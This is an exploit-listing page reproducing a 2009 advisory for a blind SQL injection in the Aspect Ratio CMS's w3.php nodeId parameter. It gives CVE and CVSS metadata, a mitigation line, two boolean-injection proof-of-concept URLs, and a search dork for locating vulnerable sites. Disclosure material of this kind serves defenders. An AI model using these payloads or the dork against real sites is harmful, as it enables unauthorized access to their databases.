header-logo
Suggest Exploit
vendor:
Aspect Ratio
by:
Stephan Sattler
8,8
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: Aspect Ratio
Affected Version From: 1.0
Affected Version To: 1.2
Patch Exists: Yes
Related CWE: CVE-2009-4010
CPE: a:meso:aspect_ratio
Metasploit: https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2009-4010/https://www.rapid7.com/db/vulnerabilities/suse-cve-2009-4010/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2009

Aspect Ratio Blind SQL Injection Vulnerability

$_GET["nodeId"] isn't sanitized before executing the database query. An attacker can use this for a blind SQL injection attack. URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms

Mitigation:

The vulnerability can be mitigated by sanitizing the user input before executing the database query.
Source

Exploit-DB raw data:

# Author: Stephan Sattler // http://www.solidmedia.de
# Software Website: http://www.meso.net
# Software Link: http://www.meso.net/aspekt-ratio
# Dork: inurl:w3.php?nodeId=
 
 
[ Vulnerability ]


# Explanation:

$_GET["nodeId"] isn't sanitized before executing the database query.
An attacker can use this for a blind SQL injection attack.


# Exploiting the Vulnerability // PoC:

URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=1 - will show the page
URL: http://[site]/[path]/w3.php?nodeId=8348 and (select 1)=0 - will show an error page by aspect ratio Cms

Navigation

Suggest Exploit

Services By CQR